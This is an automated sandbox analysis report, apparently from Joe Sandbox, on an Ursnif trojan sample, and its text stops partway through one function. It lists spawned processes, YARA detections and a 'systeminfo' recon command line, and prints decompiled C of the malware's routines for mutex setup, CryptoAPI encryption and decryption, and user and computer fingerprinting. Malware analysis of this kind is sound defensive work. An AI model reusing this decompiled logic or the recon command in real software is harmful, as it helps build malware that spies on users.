                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:46
                                                        Start time:16:20:42
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:48
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                                                        Imagebase:0x7ff7bb450000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        General

                                                        Target ID:49
                                                        Start time:16:20:59
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                        Imagebase:0x7ff6b45b0000
                                                        File size:99272 bytes
                                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security

                                                        General

                                                        Target ID:51
                                                        Start time:16:21:05
                                                        Start date:04/05/2022
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff647620000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 062800DC Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 43 62800dc-6280125 RtlInitializeCriticalSection call 6279394 46 628014d-628014f 43->46 47 6280127-628014b memset RtlInitializeCriticalSection 43->47 48 6280150-6280156 46->48 47->48 49 6280558-6280562 48->49 50 628015c-6280180 CreateMutexA GetLastError 48->50 51 628019d-628019f 50->51 52 6280182-6280187 50->52 55 6280553 51->55 56 62801a5-62801b0 call 6285261 51->56 53 6280189-6280196 CloseHandle 52->53 54 628019b 52->54 53->55 54->51 58 6280557 55->58 56->58 60 62801b6-62801c1 call 6288452 56->60 58->49 60->58 63 62801c7-62801d9 GetUserNameA 60->63 64 62801db-62801f3 RtlAllocateHeap 63->64 65 62801fd-628020d 63->65 64->65 66 62801f5-62801fb GetUserNameA 64->66 67 628020f-6280214 65->67 68 6280216-6280233 NtQueryInformationProcess 65->68 66->65 67->68 71 628025d-6280267 67->71 69 6280239-6280248 OpenProcess 68->69 70 6280235 68->70 72 628024a-628024f GetLastError 69->72 73 6280256-6280257 CloseHandle 69->73 70->69 74 6280269-6280285 GetShellWindow GetWindowThreadProcessId 71->74 75 62802a4-62802a8 71->75 72->71 76 6280251 72->76 73->71 77 6280297-628029e 74->77 78 6280287-628028d 74->78 79 62802aa-62802ba memcpy 75->79 80 62802bd-62802d4 call 627f01f 75->80 81 62802ed-6280329 call 6289370 call 6286c1e call 629087a 76->81 77->75 83 62802a0 77->83 78->77 82 628028f-6280295 78->82 79->80 87 62802e1-62802e7 80->87 88 62802d6-62802da 80->88 96 628032b-628033a CreateEventA call 628e803 81->96 97 628033f-628034e call 627e1b1 81->97 82->75 83->75 87->58 87->81 88->87 90 62802dc call 62918c0 88->90 90->87 96->97 97->58 101 6280354-6280367 RtlAllocateHeap 97->101 101->58 102 628036d-628038d OpenEventA 101->102 103 62803af-62803b1 102->103 104 628038f-628039e CreateEventA 102->104 106 62803b2-62803d9 call 62873aa 103->106 105 62803a0-62803aa GetLastError 104->105 104->106 105->58 109 62803df-62803ed 106->109 110 6280546-628054d 106->110 111 628049f-62804a5 109->111 112 62803f3-628040b call 628b6d6 109->112 110->58 113 62804b1-62804b8 111->113 114 62804a7-62804ac call 629157a call 627708f 111->114 112->58 130 6280411-6280418 112->130 113->55 115 62804be-62804c3 113->115 114->113 118 628051f-6280544 call 62873aa 115->118 119 62804c5-62804cb 115->119 118->110 131 628054f-6280550 118->131 122 62804da-62804f0 RtlAllocateHeap 119->122 123 62804cd-62804d4 SetEvent 119->123 127 628051c-628051e 122->127 128 62804f2-6280519 wsprintfA 122->128 123->122 127->118 128->127 132 628041a-6280426 130->132 133 628042c-6280440 LoadLibraryA 130->133 131->55 132->133 134 628046f-6280482 call 62881f1 133->134 135 6280442-628046a call 628e778 133->135 134->58 139 6280488-6280491 134->139 135->134 139->113 140 6280493-628049d call 62788fa 139->140 140->113
                                                          APIs
                                                          • RtlInitializeCriticalSection.NTDLL(0629A428), ref: 062800FA
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 0628012B
                                                          • RtlInitializeCriticalSection.NTDLL(0689C2D0), ref: 0628013C
                                                            • Part of subcall function 06285261: RtlInitializeCriticalSection.NTDLL(0629A400), ref: 06285285
                                                            • Part of subcall function 06285261: RtlInitializeCriticalSection.NTDLL(0629A3E0), ref: 0628529B
                                                            • Part of subcall function 06285261: GetVersion.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852AC
                                                            • Part of subcall function 06285261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852E0
                                                            • Part of subcall function 06288452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0628846C
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,06279100,?), ref: 06280165
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280176
                                                          • CloseHandle.KERNEL32(000005C0,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0628018A
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 062801D3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 062801E6
                                                          • GetUserNameA.ADVAPI32(00000000,?), ref: 062801FB
                                                          • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0628022B
                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280240
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0628024A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280257
                                                          • GetShellWindow.USER32 ref: 06280272
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 06280279
                                                          • memcpy.NTDLL(0629A2F4,?,00000018,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062802B5
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,06279100,?), ref: 06280333
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0628035D
                                                          • OpenEventA.KERNEL32(00100000,00000000,0689B9C8,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280385
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000,0689B9C8,?,?,?,?,?,?,?,06279100,?), ref: 0628039A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062803A0
                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 06280438
                                                          • SetEvent.KERNEL32(?,0628C384,00000000,00000000,?,?,?,?,?,?,?,06279100,?), ref: 062804CE
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,0628C384), ref: 062804E3
                                                          • wsprintfA.USER32 ref: 06280513
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                          • String ID:
                                                          • API String ID: 3929413950-0
                                                          • Opcode ID: 3e10d42222a89cae911f0a6903a92be626d450c1a5409d35e5c9f40cc8323fad
                                                          • Instruction ID: e1904cc28aaf054f8bd8e541b7cd8fc96e489d5f166bea1a185f03ae94dddda5
                                                          • Opcode Fuzzy Hash: 3e10d42222a89cae911f0a6903a92be626d450c1a5409d35e5c9f40cc8323fad
                                                          • Instruction Fuzzy Hash: BBC17EB0A213459FC7A0EF65FC8C91A7BE9FBC9710B14481DEA5697280C7799448CF71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D5FBB Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 189 36d5fbb-36d5ffb CryptAcquireContextW 190 36d6001-36d603d memcpy CryptImportKey 189->190 191 36d6152-36d6158 GetLastError 189->191 192 36d613d-36d6143 GetLastError 190->192 193 36d6043-36d6055 CryptSetKeyParam 190->193 194 36d615b-36d6162 191->194 197 36d6146-36d6150 CryptReleaseContext 192->197 195 36d6129-36d612f GetLastError 193->195 196 36d605b-36d6064 193->196 200 36d6132-36d613b CryptDestroyKey 195->200 198 36d606c-36d6079 call 36d6d63 196->198 199 36d6066-36d6068 196->199 197->194 204 36d607f-36d6088 198->204 205 36d6120-36d6127 198->205 199->198 201 36d606a 199->201 200->197 201->198 206 36d608b-36d6093 204->206 205->200 207 36d6098-36d60b5 memcpy 206->207 208 36d6095 206->208 209 36d60b7-36d60ce CryptEncrypt 207->209 210 36d60d0-36d60df CryptDecrypt 207->210 208->207 211 36d60e5-36d60e7 209->211 210->211 212 36d60e9-36d60f3 211->212 213 36d60f7-36d6102 GetLastError 211->213 212->206 214 36d60f5 212->214 215 36d6104-36d6114 213->215 216 36d6116-36d611e call 36d6c2c 213->216 214->215 215->200 216->200
                                                          C-Code - Quality: 58%
                                                          			E036D5FBB(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x36da0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x36da0e4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E036D6D63(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x36da0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E036D6C2C(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                                          0x036d5fc4
                                                          0x036d5fca
                                                          0x036d5fcd
                                                          0x036d5fd3
                                                          0x036d5fd3
                                                          0x036d5fd5
                                                          0x036d5fd7
                                                          0x036d5fda
                                                          0x036d5fe0
                                                          0x036d5fe1
                                                          0x036d5fe2
                                                          0x036d5fe8
                                                          0x036d5fed
                                                          0x036d5ff3
                                                          0x036d5ffb
                                                          0x036d6158
                                                          0x036d6001
                                                          0x036d6003
                                                          0x036d600c
                                                          0x036d6011
                                                          0x036d6023
                                                          0x036d6026
                                                          0x036d602a
                                                          0x036d6031
                                                          0x036d6035
                                                          0x036d603d
                                                          0x036d6143
                                                          0x036d6043
                                                          0x036d6043
                                                          0x036d6047
                                                          0x036d6048
                                                          0x036d604a
                                                          0x036d6055
                                                          0x036d612f
                                                          0x036d605b
                                                          0x036d605b
                                                          0x036d605e
                                                          0x036d6064
                                                          0x036d606a
                                                          0x036d606a
                                                          0x036d6072
                                                          0x036d6074
                                                          0x036d6079
                                                          0x036d6120
                                                          0x036d607f
                                                          0x036d6085
                                                          0x036d6088
                                                          0x036d608b
                                                          0x036d608d
                                                          0x036d608e
                                                          0x036d6093
                                                          0x036d6095
                                                          0x036d6095
                                                          0x036d609f
                                                          0x036d60a4
                                                          0x036d60a7
                                                          0x036d60aa
                                                          0x036d60ac
                                                          0x036d60b5
                                                          0x036d60df
                                                          0x036d60b7
                                                          0x036d60c8
                                                          0x036d60c8
                                                          0x036d60e7
                                                          0x00000000
                                                          0x00000000
                                                          0x036d60e9
                                                          0x036d60ec
                                                          0x036d60ef
                                                          0x036d60f3
                                                          0x00000000
                                                          0x036d60f5
                                                          0x036d6104
                                                          0x036d610a
                                                          0x036d6112
                                                          0x036d6112
                                                          0x00000000
                                                          0x036d60f3
                                                          0x036d60f7
                                                          0x036d60fd
                                                          0x036d6102
                                                          0x036d6119
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d6102
                                                          0x036d6079
                                                          0x036d6132
                                                          0x036d6135
                                                          0x036d6135
                                                          0x036d614a
                                                          0x036d614a
                                                          0x036d6162

                                                          APIs
                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,036D24D8,00000001,036D58D7,00000000), ref: 036D5FF3
                                                          • memcpy.NTDLL(036D24D8,036D58D7,00000010,?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740), ref: 036D600C
                                                          • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 036D6035
                                                          • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 036D604D
                                                          • memcpy.NTDLL(00000000,75BCC740,059695B0,00000010), ref: 036D609F
                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,059695B0,00000020,?,?,00000010), ref: 036D60C8
                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,059695B0,?,?,00000010), ref: 036D60DF
                                                          • GetLastError.KERNEL32(?,?,00000010), ref: 036D60F7
                                                          • GetLastError.KERNEL32 ref: 036D6129
                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 036D6135
                                                          • GetLastError.KERNEL32 ref: 036D613D
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 036D614A
                                                          • GetLastError.KERNEL32(?,?,?,036D24D8,00000001,036D58D7,00000000,?,036D1D97,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D6152
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                          • String ID:
                                                          • API String ID: 1967744295-0
                                                          • Opcode ID: b578199a12a3e25633d14af03cac8e7a9aa016bd3e4f72839a25c5cb3b7d76d2
                                                          • Instruction ID: 836ec3413eb91b3df828870aa4ab0e6a051a8b5a919b5b861f594f50fcd83932
                                                          • Opcode Fuzzy Hash: b578199a12a3e25633d14af03cac8e7a9aa016bd3e4f72839a25c5cb3b7d76d2
                                                          • Instruction Fuzzy Hash: C3514CB1D00208FFDB10EFA8ED84AAEBFB9FB04344F448429F945E6244D7719A14DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D3365 Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 398 36d3365-36d3379 399 36d337b-36d3380 398->399 400 36d3383-36d3395 call 36d2119 398->400 399->400 403 36d33e9-36d33f6 400->403 404 36d3397-36d33a7 GetUserNameW 400->404 406 36d33f8-36d340f GetComputerNameW 403->406 405 36d33a9-36d33b9 RtlAllocateHeap 404->405 404->406 405->406 407 36d33bb-36d33c8 GetUserNameW 405->407 408 36d344d-36d3471 406->408 409 36d3411-36d3422 RtlAllocateHeap 406->409 410 36d33d8-36d33e7 HeapFree 407->410 411 36d33ca-36d33d6 call 36d708d 407->411 409->408 412 36d3424-36d342d GetComputerNameW 409->412 410->406 411->410 414 36d342f-36d343b call 36d708d 412->414 415 36d343e-36d3447 HeapFree 412->415 414->415 415->408
                                                          C-Code - Quality: 96%
                                                          			E036D3365(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x36da310; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E036D2119( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x36da344 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x36da2d8, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E036D708D(_v8 + _v8, _t64);
							}
							HeapFree( *0x36da2d8, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x36da2d8, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E036D708D(_v8 + _v8, _t64);
						}
						HeapFree( *0x36da2d8, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                                          0x036d3365
                                                          0x036d336d
                                                          0x036d3371
                                                          0x036d3374
                                                          0x036d3379
                                                          0x036d337b
                                                          0x036d3380
                                                          0x036d3380
                                                          0x036d3386
                                                          0x036d3388
                                                          0x036d3395
                                                          0x036d33f6
                                                          0x036d3397
                                                          0x036d339c
                                                          0x036d33a2
                                                          0x036d33a7
                                                          0x036d33b5
                                                          0x036d33b9
                                                          0x036d33c8
                                                          0x036d33cf
                                                          0x036d33d6
                                                          0x036d33d6
                                                          0x036d33e1
                                                          0x036d33e1
                                                          0x036d33b9
                                                          0x036d33a7
                                                          0x036d33f8
                                                          0x036d33fe
                                                          0x036d3408
                                                          0x036d340a
                                                          0x036d340f
                                                          0x036d341e
                                                          0x036d3422
                                                          0x036d342d
                                                          0x036d3434
                                                          0x036d343b
                                                          0x036d343b
                                                          0x036d3447
                                                          0x036d3447
                                                          0x036d3422
                                                          0x036d3452
                                                          0x036d3454
                                                          0x036d3457
                                                          0x036d3459
                                                          0x036d345c
                                                          0x036d345f
                                                          0x036d3469
                                                          0x036d346d
                                                          0x036d3471

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 036D339C
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 036D33B3
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 036D33C0
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D33E1
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 036D3408
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 036D341C
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 036D3429
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 036D3447
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 244d19eb9d45c2dfa52af4567eecb27cad85c6472101678d3b72be25303f505d
                                                          • Instruction ID: 39b29ab8b290d0f03ceb94bfbda0fec85b879db253913afe0136e60aa68d7602
                                                          • Opcode Fuzzy Hash: 244d19eb9d45c2dfa52af4567eecb27cad85c6472101678d3b72be25303f505d
                                                          • Instruction Fuzzy Hash: 62315A75E00205EFDB10EFA9ED81A6EB7F9FF48200F694469E504D7318DB30EA119B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06278FEC Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 522 6278fec-6278ffe 523 6279000-6279006 522->523 524 6279008 522->524 525 627900e-6279022 call 6287ac9 523->525 524->525 528 6279024-6279032 StrRChrA 525->528 529 627905e-6279088 call 627c431 525->529 530 6279037 528->530 531 6279034-6279035 528->531 536 62790a6-62790ae 529->536 537 627908a-627908e 529->537 533 627903d-6279058 _strupr lstrlen call 6290ee0 530->533 531->533 533->529 538 62790b5-62790d3 CreateEventA 536->538 539 62790b0-62790b3 536->539 537->536 541 6279090-627909b 537->541 543 6279107-627910d GetLastError 538->543 544 62790d5-62790dc call 6285e8d 538->544 542 6279113-627911a 539->542 541->536 545 627909d-62790a4 541->545 548 627911c-6279123 RtlRemoveVectoredExceptionHandler 542->548 549 6279129-627912e 542->549 547 627910f-6279111 543->547 544->543 551 62790de-62790e5 544->551 545->536 545->545 547->542 547->549 548->549 552 62790e7-62790f3 RtlAddVectoredExceptionHandler 551->552 553 62790f8-62790fb call 62800dc 551->553 552->553 555 6279100-6279105 553->555 555->543 555->547
                                                          APIs
                                                          • StrRChrA.SHLWAPI(0689B5B0,00000000,0000005C,?,?,?), ref: 06279028
                                                          • _strupr.NTDLL ref: 0627903E
                                                          • lstrlen.KERNEL32(0689B5B0,?,?), ref: 06279046
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 062790C6
                                                          • RtlAddVectoredExceptionHandler.NTDLL(00000000,0629076B), ref: 062790ED
                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 06279107
                                                          • RtlRemoveVectoredExceptionHandler.NTDLL(061605B8), ref: 0627911D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 2251957091-0
                                                          • Opcode ID: ef11461e8d60aa035c96a087b598c1df6b18e36e54b1886e189fc1fce90949b0
                                                          • Instruction ID: 5aa408087e8cf4f51762028f77259e4975f617ccfc3ccb1af70b2e6289b51b85
                                                          • Opcode Fuzzy Hash: ef11461e8d60aa035c96a087b598c1df6b18e36e54b1886e189fc1fce90949b0
                                                          • Instruction Fuzzy Hash: AA31A672E203155FEB91AFB8FC8CD6E77AAA785250B150425EF12E7140D6358881CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D4321 Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E036D4321(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
